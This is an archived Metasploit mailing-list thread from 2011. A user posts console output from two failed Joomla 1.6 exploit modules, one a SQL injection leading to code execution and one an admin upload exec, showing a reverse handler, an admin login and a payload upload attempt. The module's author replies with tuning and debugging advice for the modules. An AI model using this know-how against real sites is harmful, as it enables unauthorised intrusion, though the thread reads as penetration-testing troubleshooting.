Home page logo
/

metasploit logo Metasploit mailing list archives

Re: joomla_filter_order.rb (Joomla 1.6.0 SQLIn to RCE)
From: GulfTech Security Research <security () gulftech org>
Date: Fri, 3 Jun 2011 17:30:59 -0400

The proper BMCT value will differ greatly from platform to platform, since
server performance directly affects the delay. The only advice I would give
is start low and go high as not to choke the mysql daemon.

In regards to the admin exec bit, it is really hard to tell from your email
as there is no "show options" output etc. given. But, if you set the DBUG
option, the http response will be "pp"ed to the console, and should give you
the tools you need to self diagnose the problem.

Good luck!

~James

On Fri, Jun 3, 2011 at 4:39 PM, Jeffs <jeffs () speakeasy net> wrote:

Hello All,

Anybody get joomla_filter_order and/or joomla_16_admin_exec to work?

I've launched it against a vulnerable 1.6 install of Joomla and get the
following (even tried varying BMCT and BMCR as instructed):

msf exploit(joomla_filter_order) > exploit
[*] Started reverse handler on 192.168.1.108:4444
[*] Initializing exploit code ...
################################################
# Joomla! 1.6.0 SQL Injection -> PHP execution #
################################################
# By James Bercegay # http://www.gulftech.org/ #
################################################
[*] Attempting to determine Joomla version
[*] The target is running Joomla version : 1.6
[*] Host appears vulnerable!
[*] Got database table prefix : jos_
[*] Calculating target response times
[*] Benchmarking 1 normal requests
[*] Normal request avg: 0 seconds
[*] Benchmarking 1 delayed requests
[*] Delayed request avg: 1 seconds
[-] Either your benchmark threshold is too small, or host is not vulnerable
[-] To increase the benchmark threshold adjust the value of the BMDF option
[-] To increase the expression iterator adjust the value of the BMCT option
[*] Exploit completed, but no session was created.
msf exploit(joomla_filter_order) >



msf exploit(joomla_16_admin_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.108:4444
[*] Attempting to extract a valid request token
[*] Got token: 5546d400d2ac74f8bcc6f23ea1eec261
[*] Got Cookie: 114a3fcff61e5bebf5463b377d1563a3 =>
e146646fc1c90611ba2117118785823c
[*] Attempting to login as: admin
[*] Successfully logged in as: admin
[*] Attempting to extract refreshed request token
[*] Got token: 44e14542b6a247c4281e7004dff16397
[*] Attempting to upload payload wrapper component
[*] Exploit completed, but no session was created.
msf exploit(joomla_16_admin_exec) >


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]